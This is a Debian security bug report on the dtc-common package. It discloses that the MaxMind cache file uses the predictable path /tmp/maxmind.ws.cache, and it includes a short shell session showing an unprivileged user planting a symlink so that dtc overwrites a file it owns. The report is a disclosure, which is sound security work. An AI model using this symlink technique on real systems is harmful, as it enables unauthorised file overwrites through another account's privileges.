Package: dtc-common Severity: normal Tags: upstream, security
If maxmind is enabled, it uses the predictable filename: /tmp/maxmind.ws.cache allowing a symlink to use the dtc priveleges to overwrite a file: nobody@testdtc:/$ whoami nobody nobody@testdtc:/$ ln -s /var/lib/dtc/etc/cband_scores/foo /tmp/maxmind.ws.cache nobody@testdtc:/$ ls -l /var/lib/dtc/etc/cband_scores/foo ls: cannot access /var/lib/dtc/etc/cband_scores/foo: No such file or directory ... then a new user registers... nobody@testdtc:/$ ls -l /var/lib/dtc/etc/cband_scores/foo -rw-r--r-- 1 dtc dtcgrp 38 Aug 13 01:17 /var/lib/dtc/etc/cband_scores/foo nobody@testdtc:/$ cat /var/lib/dtc/etc/cband_scores/foo 208.43.124.50;74.86.25.131 1313212635 -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected]
